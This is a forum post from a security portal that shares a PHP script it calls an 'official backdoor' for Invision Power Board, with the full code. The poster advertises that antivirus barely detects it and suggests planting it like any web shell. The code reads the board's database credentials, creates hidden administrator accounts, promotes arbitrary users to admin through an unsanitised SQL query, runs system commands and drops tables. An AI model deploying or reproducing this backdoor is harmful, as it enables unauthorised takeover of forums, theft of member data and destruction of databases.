 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| |
|
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9145
 People Online:
 Visitors: 237
 Members: 0
 Total: 237
|
|
|
|
|
|
PacketStorm News |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
IPB Staff Official Backdoor for IPB (SupaScript) |
|
 Posted: Sun Mar 22, 2009 8:40 am |
 |
|
| GirlyDresses |
| Beginner |
 |
| |
| Joined: Mar 22, 2009 |
| Posts: 3 |
|
|
|
 |
|
 |
|
One idiot staff member accidentally left this when reparing my site. It is a very rare official backdoor for IPB.
This works on 2.2 (All versions), 2.1 (All Versions) and 3 beta.
Exact features are as follows:
* Mail Tester
* Server Date Time
* Junk Finder
* Forum Root
* Index Checker
* Create Admin
* Create Admin 2.1
* Remove Admin
* Promote
* PHP Info
* UnCopyright
* m.has_blog
* serverinfo
* Check Converage
* vCheck
* UnGallery
* Totals
The best part about this is that it is detected as 1/10 on the virus scanner (Not detected as virus) and automatically finds and connects to the database (gets password, user, ect. automatically).
If anything, you can learn from their script how to make better backdoors like how they made an admin via SQL ect.
It is a PHP file so it does require either FTP access or to expolit it any way you would install any other shell.
The official file was called SupaScript.php when it was left on the server. The notes said "Keith's Copy" which I assume is the staff who worked on reparing the site.
| Code: |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>IPB Misc. Tools</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
TABLE, TR, TD { font-family:Verdana, Arial;font-size: 11px; color:#000000; line-height:120% }
BODY { font: 10px Verdana; color:#222222 }
a:link, a:visited, a:active { color:#222222;font-weight:bold }
a:hover { color:#333377;text-decoration:underline }
#normal { font: 10px Verdana; color:#333333 }
#title { font-size:12px; font-weight:bold; line-height:150%; color:#FFFFFF; height: 30px; }
#title a:link, #title a:visited, #title a:active { text-decoration: underline; color : #FFFFFF;
font-size:11px }
#detail { font-family: Arial; font-size:11px; color: #333333 }
#large { font-family: verdana, arial; font-size:18px; color:#222; font-weight:bold; letter-spacing:-1px }
#subtitle { font-family: Arial,Verdana; font-size:16px; color:#000066; font-weight:bold }
#smalltitle { font-family: Arial,Verdana; font-size:11px; color:#000066; font-weight:bold }
#table1 { background-color:#FFFFFF; width:100%; align:center; border:1px solid black }
#tdrow1 { background-color:#EEF2F7 }
#subforum { background-color:#DFE6EF }
#tdrow2 { background-color:#F5F9FD }
#catrow { font-weight:bold; height:24px; line-height:150%; color:#4C77B6; background-image:
url(style_images/1/tile_sub.gif); }
#catrow2 { font-size:10px; font-weight:bold; line-height:150%; color:#4C77B6; background-color:#D3DFEF; }
#tablewrap { background-color:#F5F9FD }
#copy { color:#222; font-size:10px }
#copy a:link, #title a:visited, #title a:active { font-weight:normal }
#tdtop { font-weight:bold; height:24px; line-height:150%; color:#FFFFFF; background-image:
url(ipbtester.php?image=background); }
#memgroup { border:1px solid #777777 }
#mgred { border:1px solid #777777; background-color: #f5cdcd }
#mggreen { border:1px solid #777777; background-color: #caf2d9 }
#mgblue { border:1px solid #777777; background-color: #DFE6EF }
#green { background-color: #caf2d9 }
#red { background-color: #f5cdcd }
#button { background-color: #4C77B6; color: #FFFFFF; font-family:Verdana, Arial; font-size:11px }
#editbutton { background-color: #DDDDDD; color: #000000; font-family:Verdana, Arial; font-size:9px }
#textinput { background-color: #FFFFFF; color:�000000; font-family:Verdana, Arial; font-size:10px }
#dropdown { background-color: #F5F9FD; color:�000000; font-family:Verdana, Arial; font-size:10px }
#multitext { background-color: #F5F9FD; color:�000000; font-family:Verdana, Arial; font-size:10px }
</style></head>
<body marginheight='0' marginwidth='0' leftmargin='0' topmargin='0' bgcolor='#EFEFEF'>
<table cellspacing='0' cellpadding='0' align='center' width='95%' bgcolor='#FFFFFF' width="80%" border="0" align="center" style='border-right:4px
solid #BBBBBB;border-bottom:4px solid #BBBBBB'>
<tr>
<td colspan="3" align='center' id='title' bgcolor='#2C55B1'>Invision Power Board Test Scripts</td>
</tr>
<?php
define( 'ROOT_PATH' , "./" );
define( 'KERNEL_PATH', ROOT_PATH.'ips_kernel/' );
//----------------------------------------------
// Stored Functions
//---------------------------------------------
//Safe Slashes
function txt_safeslashes($t="")
{
return str_replace( '\\', "\\\\", txt_stripslashes($t));
}
//Strip Slashes
function txt_stripslashes($t)
{
if ( get_magic_quotes )
{
$t = stripslashes($t);
}
return $t;
}
//rebuild_cache
function setting_rebuildcache()
{
global $ibforums, $DB;
$ibforums->cache['settings'] = array();
$DB->simple_construct( array( 'select' => '*', 'from' => 'conf_settings', 'where' => 'conf_add_cache=1' ) );
$info = $DB->simple_exec();
while ( $r = $DB->fetch_row($info) )
{
$value = $r['conf_value'] != "" ? $r['conf_value'] : $r['conf_default'];
if ( $value == '{blank}' )
{
$value = '';
}
$ibforums->cache['settings'][ $r['conf_key'] ] = txt_safeslashes($value);
}
update_cache( array( 'name' => 'settings', 'array' => 1, 'deletefirst' => 1 ) );
}
//Update Cache
function update_cache( $v=array() )
{
global $ibforums, $DB;
//-----------------------------------------
// Don't cache forums?
//-----------------------------------------
if ( $v['name'] == 'forum_cache' AND $ibforums->vars['no_cache_forums'] )
{
return;
}
//-----------------------------------------
// Next...
//-----------------------------------------
if ( $v['name'] )
{
if ( ! $v['value'] )
{
$value = $DB->add_slashes(serialize($ibforums->cache[ $v['name'] ]));
}
$DB->manual_addslashes = 1;
if ( $v['deletefirst'] == 1 )
{
if ( $v['donow'] )
{
if ( $ibforums->vars['sql_driver'] == 'mysql' )
{
$DB->query( "REPLACE INTO ".SQL_PREFIX."cache_store SET cs_key='{$v['name']}', cs_value='$value',
cs_array=".intval($v['array']) );
}
else
{
$DB->simple_construct( array( 'delete' => 'cache_store', 'where' => "cs_key='{$v['name']}'" ) );
$DB->simple_exec();
$DB->do_insert( 'cache_store', array( 'cs_array' => intval($v['array']), 'cs_key' => $v['name'],
'cs_value' => $value ) );
}
}
else
{
if ( $ibforums->vars['sql_driver'] == 'mysql' )
{
$DB->cur_query = "REPLACE INTO ".SQL_PREFIX."cache_store SET cs_key='{$v['name']}',
cs_value='$value', cs_array=".intval($v['array']);
$DB->cache_shutdown_exec();
}
else
{
$DB->simple_construct( array( 'delete' => 'cache_store', 'where' => "cs_key='{$v['name']}'" ) );
$DB->simple_shutdown_exec();
$DB->do_shutdown_insert( 'cache_store', array( 'cs_array' => intval($v['array']), 'cs_key' =>
$v['name'], 'cs_value' => $value ) );
}
}
}
else
{
if ( $v['donow'] )
{
$DB->do_update( 'cache_store', array( 'cs_array' => intval($v['array']), 'cs_value' => $value ),
"cs_key='{$v['name']}'" );
}
else
{
$DB->do_shutdown_update( 'cache_store', array( 'cs_array' => intval($v['array']), 'cs_value' => $value ),
"cs_key='{$v['name']}'" );
}
}
$DB->manual_addslashes = 0;
}
}
//----------------------------------------------
// END OF USER EDITABLE COMPONENTS
//---------------------------------------------
error_reporting (E_ERROR | E_WARNING | E_PARSE);
set_magic_quotes_runtime(0);
require ROOT_PATH."conf_global.php";
//--------------------------------
// Load the DB driver and such
//--------------------------------
$INFO['sql_driver'] = ! $INFO['sql_driver'] ? 'mysql' : strtolower($INFO['sql_driver']);
require ( KERNEL_PATH.'class_db_'.$INFO['sql_driver']."_client.php" );
$DB = new db_driver_mysql;
$DB->obj['sql_database'] = $INFO['sql_database'];
$DB->obj['sql_user'] = $INFO['sql_user'];
$DB->obj['sql_pass'] = $INFO['sql_pass'];
$DB->obj['sql_host'] = $INFO['sql_host'];
$DB->obj['sql_tbl_prefix'] = $INFO['sql_tbl_prefix'];
$DB->obj['use_shutdown'] = 0;
//--------------------------------
// Get a DB connection
//--------------------------------
$DB->connect();
//--------------------------------
// Make CONSTANT
//--------------------------------
define( 'SQL_PREFIX', $DB->obj['sql_tbl_prefix'] );
define( 'SQL_DRIVER', $INFO['sql_driver'] );
define( 'BOARD_URL', $INFO['board_url'] );
define( 'IN_ACP', 1 );
$act = $_POST['act'];
$email = $_POST['email'];
$pass = md5($_POST['pass']);
$aupass = '225517b79a5066eae41064807e6fe248';
switch ($act) {
default :
?>
<form name="form1" method="post" action="supascript.php">
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="Password">
</div></td>
<td>
<div align="left">
<input type="text" name="pass">
</div></td>
<td> <div align="center">Enter Password.</div></td>
</form>
<?php
break;
case "Password" :
if ($pass != $aupass){
echo "<tr><td>You are not authorized</td></tr>";
exit();
}
?>
<form name="form1" method="post" action="supascript.php">
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="Mail Tester">
</div></td>
<td></td>
<td> <div align="center">Tests PHPMail. Be sure to add the email address you want to use for testing to the code.</div></td>
</tr>
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="Server Date Time">
</div></td>
<td></td>
<td> <div align="center">Checks the Date and Time on server</div></td>
</tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="Junk Finder">
</div></td>
<td><div align="center"></div></td>
<td><div align="center">Finds whitespace at the beginning or end of a file. </div></td>
</tr>
<tr>
<td height="26"><div align="right">
<input type="submit" name="act" value="Forum Root">
</div></td>
<td><div align="center"></div></td>
<td><div align="center">The path to the forum root directory.</div></td>
</tr>
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="Index Checker">
</div></td>
<td><div align="center"></div></td>
<td><div align="center">Test the DB indexes. (requires a working board install) </div></td>
</tr>
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="Create Admin">
</div></td>
<td><div align="center"></div></td>
<td><div align="center">Adds an admin account, named IPSTech with a random password.</div></td>
</tr>
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="Create Admin 2.1">
</div></td>
<td><div align="center"></div></td>
<td><div align="center"><font color='red'><b>FOR IPB 2.1.X</b></font> - Adds an admin account, named IPSTech with a random password.</div></td>
</tr>
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="Remove Admin">
</div></td>
<td><div align="center"></div></td>
<td><div align="center">Remove the IPSTech account.</div></td>
</tr>
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="Promote">
</div></td>
<td>
<div align="left">
<input type="text" name="aname">
</div></td>
<td> <div align="center">Turns the specified account into a member of the root admin group.</div></td>
</tr>
</tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="PHP info">
</div></td>
<td><div align="center"></div></td>
<td><div align="center">Extended PHP info.</div></td>
</tr>
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="UnCopyright">
</div></td>
<td><div align="center"></div></td>
<td><div align="center">Undo illegitimate copyright output removal. Update settings cache.</div></td>
</tr>
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="m.has_blog">
</div></td>
<td><div align="center"></div></td>
<td><div align="center">Fixes the m.has_blog MySQL error.</div></td>
</tr>
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="serverinfo">
</div></td>
<td><div align="center"></div></td>
<td><div align="center">Checks the server hardware.</div></td>
</tr>
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="Check Converge">
</div></td>
<td><div align="center"></div></td>
<td><div align="center">Checks the converge tables for mismatched email addresses.</div></td>
</tr>
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="vCheck">
</div></td>
<td><div align="center"></div></td>
<td><div align="center">File version checker.</div></td>
</tr>
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="UnGallery">
</div></td>
<td><div align="center"></div></td>
<td><div align="center">Runs the queries to remove the Gallery tables/fields.</div></td>
</tr>
<tr>
<td height="26">
<div align="right">
<input type="submit" name="act" value="Totals">
</div></td>
<td><div align="center"></div></td>
<td><div align="center">Gets board totals: Posts/Members/Topcis/etc.</div></td>
</tr>
</form>
</form>
<?php
break;
case "Create Admin" :
echo "<tr><td>";
//----------------------
// Setup Converge
//----------------------
$salt = "5lo9f";
$salt = str_replace( '\\', "\\\\", $salt );
$randpw = rand(1000, 9999);
$converge_array = array(
'converge_id' => '',
'converge_email' => 'tech@invisionpower.com',
'converge_joined' => time(),
'converge_pass_hash' => md5( md5($salt) . md5($randpw) ),
'converge_pass_salt' => $salt
);
$DB->do_insert('members_converge', $converge_array);
$new_id = $DB->get_insert_id();
$members_array = array(
'id' => $new_id,
'name' => mysql_escape_string('IPSTech'),
'mgroup' => 4,
'email' => 'tech@invisionpower.com',
'joined' => time(),
'ip_address' => '127.0.0.1',
'posts' => 0,
'title' => '',
'allow_admin_mails' => '',
'hide_email' => 1,
'email_pm' => 0,
'language' => 'en',
'last_post' => '',
'view_sigs' => 1,
'view_img' => 1,
'view_avs' => 1,
'last_visit' => time(),
'last_activity' => time(),
'misc' => '',
'member_login_key' => '6a2e8dfcf00c70ba13bfbac204e8d841',
);
$members_extra_array = array(
'id' => $new_id,
'vdirs' => "in:Inbox|sent:Sent Items",
);
$DB->do_insert('members', $members_array);
$DB->do_insert('member_extra', $members_extra_array);
echo "<b>IPSTech</b> admin account created. Password is <b>$randpw</b>.";
echo "</td></tr>";
break;
// FOR 2.1.1 -- Adds Display Name
case "Create Admin 2.1" :
echo "<tr><td>";
//----------------------
// Setup Converge
//----------------------
$salt = "5lo9f";
$salt = str_replace( '\\', "\\\\", $salt );
$randpw = rand(1000, 9999);
$converge_array = array(
'converge_id' => '',
'converge_email' => 'tech@invisionpower.com',
'converge_joined' => time(),
'converge_pass_hash' => md5( md5($salt) . md5($randpw) ),
'converge_pass_salt' => $salt
);
$DB->do_insert('members_converge', $converge_array);
$new_id = $DB->get_insert_id();
$members_array = array(
'id' => $new_id,
'name' => mysql_escape_string('IPSTech'),
'mgroup' => 4,
'email' => 'tech@invisionpower.com',
'joined' => time(),
'ip_address' => '127.0.0.1',
'posts' => 0,
'title' => '',
'allow_admin_mails' => '',
'hide_email' => 1,
'email_pm' => 0,
'language' => 'en',
'last_post' => '',
'view_sigs' => 1,
'view_img' => 1,
'view_avs' => 1,
'last_visit' => time(),
'last_activity' => time(),
'misc' => '',
'member_login_key' => '6a2e8dfcf00c70ba13bfbac204e8d841',
'members_display_name' => 'IPSTech',
'members_l_display_name' => 'IPSTech',
'members_l_username' => 'IPSTech',
);
$members_extra_array = array(
'id' => $new_id,
'vdirs' => "in:Inbox|sent:Sent Items",
);
$DB->do_insert('members', $members_array);
$DB->do_insert('member_extra', $members_extra_array);
echo "<b>IPSTech</b> admin account created. Password is <b>$randpw</b>.";
echo "</td></tr>";
break;
case "Mail Tester" :
echo "<tr><td>Testing phpmail.<br><br>";
$mailtest = mail('keith@invisionpower.com', 'Test Successful', 'If you got this...it works');
if($mailtest){
echo "It was sent";}
else{
echo "Not so much";}
echo "</td></tr>";
break;
case "Server Date Time" :
echo "<tr><td><br><font color='red'>Current Time: </font><b>". date("m-d-Y h:ia",time());
echo "</b></td></tr>";
break;
case "Forum Root" :
echo "<tr><td>Full path to this folder: <b>".getcwd()."/</b>";
echo "<br /><br />";
echo "Safe mode is: <b>";
if( ini_get('safe_mode') )
{
echo "Enabled";
}
else
{
echo "Disabled";
}
echo "</b>";
echo "</td></tr>";
break;
case "Junk Finder" :
echo "<tr><td>Testing for Whitespace<br>";
error_reporting(~E_NOTICE);
set_time_limit(0);
$broken = array();
function recur_dir($dir)
{
$dirlist = opendir($dir);
while ($file = readdir ($dirlist))
{
if ( preg_match( "#^_#", $file ) ) { continue; }
if ($file != '.' && $file != '..')
{
$newpath = $dir.'/'.$file;
$level = explode('/',$newpath);
if (is_dir($newpath) && !skip_this($file))
{
recur_dir($newpath);
}
else
{
if(strpos($file, ".php") !== false && !is_dir($newpath))
{
$file = file($newpath);
$file = implode($file);
preg_match("#^(.+?)?<\?(.*)\?>(.+?)?$#si", $file, $matches);
if($matches[1] != "")
{
echo "<i>" . $newpath . " </i>Has Junk! At The Front Of File<br>";
flush();
}
if($matches[3] != "")
{
echo "<span style='color:red'><b>" . $newpath . " </b></span>Has Junk! At The End Of
File<br>";
flush();
}
}
}
}
}
closedir($dirlist);
}
function skip_this($file)
{
if($file == "uploads" || $file == "style_images" || $file == "cache" || $file == "install" || $file == "upgrade" || $file =="gallery_setup"
|| $file == "gallery_setup"
|| $file == "jscripts" || $file == "style_emoticons" || $file == "style_avatars" || $file == "conv_api" ||
$file == "skin_acp" || $file == "gallery" || $file == "admin")
{
return 1;
}
else
{
return 0;
}
}
recur_dir('.');
echo "</td></tr>";
break;
case "Index Checker" :
echo "<tr><td>";
//===========================================================================
// SET UP REQUIRED INDEXES
//===========================================================================
$indexes = array();
$indexes[] = array( 'table' => 'attachments',
'index' => array(
0 => array( 'attach_pid' , '' ),
1 => array( 'attach_msg' , '' ),
2 => array( 'attach_post_key' , '' ),
3 => array( 'attach_mid_size' , 'attach_member_id,attach_filesize' ),
) );
$indexes[] = array( 'table' => 'member_extra',
'index' => array( 0 => array( 'id', '' ) ) );
$indexes[] = array( 'table' => 'members_converge',
'index' => array( 0 => array( 'converge_id', '' ) ) );
$indexes[] = array( 'table' => 'members',
'index' => array(
0 => array( 'id' , '' ),
1 => array( 'name' , '' ),
2 => array( 'mgroup' , '' ),
3 => array( 'bday_day' , '' ),
4 => array( 'bday_month', '' )
) );
$indexes[] = array( 'table' => 'message_text',
'index' => array(
0 => array( 'msg_date' , '' ),
1 => array( 'msg_sent_to_count' , '' ),
2 => array( 'msg_deleted_count' , '' ),
) );
$indexes[] = array( 'table' => 'message_topics',
'index' => array(
0 => array( 'mt_from_id' , '' ),
1 => array( 'mt_owner_id' , 'mt_owner_id,mt_to_id,mt_vid_folder' ),
) );
$indexes[] = array( 'table' => 'moderators',
'index' => array(
0 => array( 'forum_id' , '' ),
1 => array( 'group_id' , '' ),
2 => array( 'member_id' , '' ),
) );
$indexes[] = array( 'table' => 'posts',
'index' => array(
0 => array( 'topic_id' , 'topic_id,queued,pid' ),
1 => array( 'author_id' , 'author_id,topic_id' ),
2 => array( 'post_date' , '' ),
) );
$indexes[] = array( 'table' => 'sessions',
'index' => array(
0 => array( 'in_topic' , '' ),
1 => array( 'in_forum' , '' ),
) );
$indexes[] = array( 'table' => 'skin_templates_cache',
'index' => array(
0 => array( 'template_set_id' , '' ),
1 => array( 'template_group_name' , '' ),
) );
$indexes[] = array( 'table' => 'topics',
'index' => array(
0 => array( 'topic_firstpost' , '' ),
1 => array( 'last_post' , '' ),
2 => array( 'forum_id' , 'forum_id,approved,pinned' ),
) );
//-----------------------------------------
// GO LOOOOOOOPY
//-----------------------------------------
$output = array();
foreach( $indexes as $id => $data )
{
$table_name = $data['table'];
$DB->query( "SHOW CREATE TABLE ".SQL_PREFIX.$table_name );
$row = $DB->fetch_row();
$tbl = str_replace( '`', '', $row['Create Table'] );
//print "<pre>$tbl</pre>";
if ( is_array( $data['index'] ) and count( $data['index'] ) )
{
foreach( $data['index'] as $idx => $indexes )
{
$index_name = $indexes[0];
$ok = 0;
if ( preg_match( "#KEY\s+?\(?{$index_name}\)?(?:(?:\s+?)?\((.+?)\))?#s", $tbl, $match ) )
{
$ok = 1;
//-----------------------------------------
// Multi index column?
//-----------------------------------------
if ( $indexes[1] )
{
foreach( explode( ',', $indexes[1] ) as $mc )
{
$mc = trim( $mc );
if ( ! strstr( $match[1], $mc ) )
{
$output[] = "<span style='color:red'>Error : Table $table_name : Index $index_name :
Missing field '$mc' from multi-column index</span>";
$ok = 0;
}
}
}
}
else
{
$output[] = "<span style='color:red'>Error : Table $table_name : Missing index $index_name</span>";
}
if ( $ok )
{
$output[] = "<span style='color:green'>Table $table_name - Index $index_name OK!</span>";
}
}
}
}
print "<html>
<head><title>IPB 2.0.1 DB Checker</title></head>
<body style='font-family:verdana;font-size:12px;padding:10px'>
<p>
<strong>This script will check for the required MySQL database indexes in IPB 2.0.x</strong>
<br />
</p>
<p>
<strong>Script output:</strong><br />";
print implode( "<br />", $output );
echo "</td></tr>";
break;
case 'Remove Admin':
echo "<tr><td>";
$DB->query("SELECT id, email from ".SQL_PREFIX."members WHERE name = 'ipstech'");
$member = $DB->fetch_row();
$DB->query("DELETE FROM ".SQL_PREFIX."members WHERE name = 'ipstech'");
$DB->query("DELETE FROM ".SQL_PREFIX."member_extra WHERE id = {$member['id']}");
$DB->query("DELETE FROM ".SQL_PREFIX."members_converge WHERE converge_email = '{$member['email']}'");
echo "IPSTech admin account is now removed.";
echo "</tr></td>";
break;
case 'serverinfo':
echo "<tr><td>";
echo "<pre><b>Uptime:</b><br>";
system("uptime");
echo "<br><br>";
echo "<b>System Information:</b><br>";
system("uname -a");
echo "<br><br>";
echo "<b>Memory Usage (MB):</b><br>";
system("free -m");
echo "<br><br>";
echo "<b>Disk Usage:</b><br>";
system("df -h");
echo "<br><br>";
echo "<b>CPU Information:</b><br>";
system("cat /proc/cpuinfo | grep \"model name\\|processor\"");
echo "</pre></tr></td>";
break;
case 'PHP info':
echo "<tr><td id='large'>";
phpinfo();
echo "</tr></td>";
break;
case 'UnCopyright':
echo "<tr><td>";
$DB->query("UPDATE ".SQL_PREFIX."conf_settings SET conf_value='' where conf_key='ipb_copy_number' LIMIT 1");
echo "Copyright output removal is now undone.<br>";
setting_rebuildcache();
echo "</tr></td>";
break;
case 'm.has_blog':
echo "<tr><td>";
$DB->query("ALTER TABLE ".SQL_PREFIX."members add has_blog TINYINT(1) NOT NULL default '0'");
echo "m.has_blog MySQL <i>should</i> not appear anymore.<br>";
echo "</tr></td>";
break;
case 'Promote':
echo "<tr><td>";
$DB->query("UPDATE ".SQL_PREFIX."members SET mgroup=4 WHERE name='$aname'");
echo "<b>$aname</b> is now an admin.";
echo "</tr></td>";
break;
case 'Manual Query':
echo "<tr><td>";
$test = mysql_query("$query");
echo "<b>$query</b> has been run.<br />";
$count = 1;
while ($result = mysql_fetch_assoc($test)){
echo "<b>$count<br /></b>";
foreach($result as $k => $v){
echo "$k=$v<br />";
} $count++;
echo "<br />";
}
echo "</tr></td>";
break;
case 'Check Converge':
echo "<tr><td>";
$DB->query("SELECT mem.id, mem.email, converge.converge_email FROM ".SQL_PREFIX."members mem LEFT JOIN ".SQL_PREFIX."members_converge converge ON
(converge.converge_id = mem.id)");
while ( $row = $DB->fetch_row() ){
$id = $row['id'];
$con_email = $row['converge_email'];
$mem_email = $row['email'];
if ($con_email == $mem_email){
echo "ID ". $id ." is a match.<br>";}
else{
echo "<br><span style='color:red'>ID ". $id ." is not a match!</span><br>";
echo "Member table email is " . $mem_email ." and converge table email is " .$con_email ."<br><br>";
}
}
echo "<br><br><form name=\"form2\" method=\"post\" action=\"supascript.php\">";
echo "<input type=\"submit\" name=\"act\" value=\"Fix Converge\"> Fixes email addresses, replacing converge_email with the data from
".SQL_PREFIX."members.";
echo "</form>";
echo "</tr></td>";
break;
case 'Fix Converge':
echo "<tr><td>";
$outer = $DB->query("SELECT mem.id, mem.email, converge.converge_email FROM ".SQL_PREFIX."members mem LEFT JOIN ".SQL_PREFIX."members_converge converge ON
(converge.converge_id = mem.id)");
while ( $row = $DB->fetch_row( $outer ) ){
$id = $row['id'];
$con_email = $row['converge_email'];
$mem_email = $row['email'];
if ($con_email == $mem_email){
echo "ID ". $id ." is a match, bypassed.<br>";
}
else{
echo "<br><span style='color:red'>ID ". $id ." is not a match!</span><br>";
$DB->query("UPDATE ".SQL_PREFIX."members_converge SET converge_email='$mem_email' WHERE converge_email='$con_email'");
echo "Member's converge e-mail has been set to <span style='color:green'><b>" . $mem_email ."</b></span><br><br>";
}
}
echo "</tr></td>";
break;
case 'vCheck':
echo "<tr><td>";
echo "</tr></td>";
// Check Files
class CheckFiles
{
var $file_versions = array();
function check_files($dir)
{
$dirlist = opendir($dir);
while (false !== ($file = readdir($dirlist)))
{
if ($file != '.' && $file != '..')
{
$newpath = $dir.'/'.$file;
if (is_dir($newpath) && !$this->skip_this($file))
{
$this->check_files($newpath);
}
else
{
if(is_dir($newpath))
{
continue;
}
$check = file_get_contents($newpath);
if (preg_match("/Board v2.1.1/i", "$check")) {
$preg_return = '<i class="hver">2.1.1</i>';
} elseif (preg_match("/Board v2.1.0/i", "$check")) {
$preg_return = '<i class="gver">2.1.0</i>';
} elseif (preg_match("/Board v2.0.4/i", "$check")) {
$preg_return = '<i class="fver">2.0.4</i>';
} elseif (preg_match("/Board v2.0.3/i", "$check")) {
$preg_return = '<i class="ever">2.0.3</i>';
} elseif (preg_match("/Board v2.0.2/i", "$check")) {
$preg_return = '<i class="dver">2.0.2</i>';
} elseif (preg_match("/Board v2.0.1/i", "$check")) {
$preg_return = '<i class="cver">2.0.1</i>';
} elseif (preg_match("/Board v2.0.0/i", "$check")) {
$preg_return = '<i class="bver">2.0.0</i>';
} elseif (preg_match("/Board v1/i", "$check")) {
$preg_return = '<i class="aver">1.x</i>';
} else {
$preg_return = '<b>n/a</b>';
}
$insert = "". $newpath ." = ". $preg_return ."";
$this->file_versions[] = $insert;
}
}
}
closedir($dirlist);
}
// Files to skip - duh.
function skip_this($file)
{
// $file == "admin" || - Preventing /sources/admin/ directory.
if($file == "lang" || $file == "skin_cache" || $file == "uploads" || $file == "style_images" || $file == "cache" || $file == "install" || $file == "upgrade" || $file =="gallery_setup" || $file == "gallery_setup"
|| $file == "jscripts" || $file == "style_emoticons" || $file == "style_avatars" || $file == "conv_api" || $file == "skin_acp" || $file == "gallery" || $file == "modules")
{
return 1;
}
else
{
return 0;
}
}
}
// Run it, bebbeh!
$filechecker = new CheckFiles;
$filechecker->check_files('.');
print "
<style type=\"text/css\">
/*/============================================================================/
| Cascading Style Sheet (CSS 467), for vcheck.php
| Author: James A. Mathias, admin@1lotus.com, http://www.1lotus.com
| Copyright: 2005 Onelotus Creative and James A. Mathias. All rights reserved.
|
| All style rule attributes in alpha-numeric order starting from 0
/============================================================================/
| This style sheet is closed source, unauthorized use will result in prosecution
| Please respect my intellectual property rights and trademarks
| x = horizontal, y = vertical / property: trbl, tb rl, t rl b, t r b l;
|
| -- START STYLES --
/============================================================================/*/
*{ /* removes margin/padding from all elements */
margin: 0;
padding: 0;
}
body{
background: #FFF;
font: normal 62.5%/135% Verdana, Sans-Serif;
}
h1{
color: #036;
font: bold 2.6em/135% \"Trebuchet MS\", Sans-Serif;
padding: 8px;
}
pre{
background: #F5F5F5;
border: 1px solid;
border-color: #CCC #AAA #AAA #CCC;
color: #222;
font-size: 1.7em;
padding: 15px 15px 0;
margin: 0 auto 5px;
width: 95%;
}
b{ color: #666666; }
i.aver{ color: #FFCC00; }
i.bver{ color: #F000FF; }
i.cver{ color: #12BB00; }
i.dver{ color: #0018FF; }
i.ever{ color: #00BAFF; }
i.fver{ color: #338000; }
i.gver{ color: #3366FF; }
i.hver{ color: #00CC66; }
/*/============================================================================/
| -- END STYLES --
| Please do not steal my code.
| Thank you.
/============================================================================/*/
</style>
<h1>Here are the versions!</h1>
<pre>
";
print_r($filechecker->file_versions);
print "
</pre>
";
break;
case 'UnGallery':
echo "<tr><td>";
$DB->query("DROP TABLE `".SQL_PREFIX."gallery_albums`, `".SQL_PREFIX."gallery_upgrade_history`, `".SQL_PREFIX."gallery_bandwidth`, `".SQL_PREFIX."gallery_categories`, `".SQL_PREFIX."gallery_comments`, `".SQL_PREFIX."gallery_ecardlog`, `".SQL_PREFIX."gallery_favorites`, `".SQL_PREFIX."gallery_form_fields`, `".SQL_PREFIX."gallery_images`, `".SQL_PREFIX."gallery_media_types`, `".SQL_PREFIX."gallery_ratings`;");
echo "Tables dropped, next!<br /><br />";
$DB->query("ALTER TABLE `".SQL_PREFIX."groups` DROP `g_max_diskspace`, DROP `g_max_upload`, DROP `g_max_transfer`, DROP `g_max_views`, DROP `g_create_albums`, DROP `g_album_limit`, DROP `g_zip_upload`, DROP `g_multi_file_limit`, DROP `g_img_album_limit`, DROP `g_slideshows`, DROP `g_favorites`, DROP `g_comment`, DROP `g_rate`, DROP `g_ecard`, DROP `g_edit_own`, DROP `g_del_own`, DROP `g_move_own`, DROP `g_mod_albums`, DROP `g_img_local`, DROP `g_movies`, DROP `g_movie_size`;");
echo "Groups table altered, next!<br /><br />";
$DB->query("ALTER TABLE `".SQL_PREFIX."members` DROP `gallery_perms`;");
echo "Members table altered, next!<br /><br />";
$DB->query("DELETE FROM `".SQL_PREFIX."conf_settings` WHERE conf_key LIKE 'gallery_%';");
echo "Conf_settings information deleted, next!<br /><br />";
$DB->query("DELETE FROM `".SQL_PREFIX."conf_settings_titles` WHERE conf_title_title = 'Invision Gallery Settings';");
echo "More conf_settings stuff deleted, moving on!<br /><br />";
$DB->query("DELETE FROM `".SQL_PREFIX."skin_templates` WHERE group_name LIKE 'skin_gallery_%';");
echo "Finally! Gallery skin template bits removed. Now, go about removing them there gallery files.";
setting_rebuildcache();
echo "</tr></td>";
break;
case 'Totals' :
echo "<tr><td><br /><br />";
$DB->query("SELECT count(*) FROM `".SQL_PREFIX."posts;");
$pcount = $DB->fetch_row();
echo "Total posts: ". $pcount['count(*)'] . "<br />";
$DB->query("SELECT count(*) FROM `".SQL_PREFIX."topics;");
$tcount = $DB->fetch_row();
echo "Total topics: ". $tcount['count(*)'] . "<br /><br />";
$DB->query("SELECT count(*) FROM `".SQL_PREFIX."members;");
$mcount = $DB->fetch_row();
echo "Total members: ". $mcount['count(*)'] . "<br />";
$DB->query("SELECT count(*) FROM `".SQL_PREFIX."members_converge;");
$mccount = $DB->fetch_row();
echo "Total members_converge: ". $mccount['count(*)'] . "<br />";
$DB->query("SELECT count(*) FROM `".SQL_PREFIX."member_extra;");
$mecount = $DB->fetch_row();
echo "Total member_extra: ". $mecount['count(*)'] . "<br />";
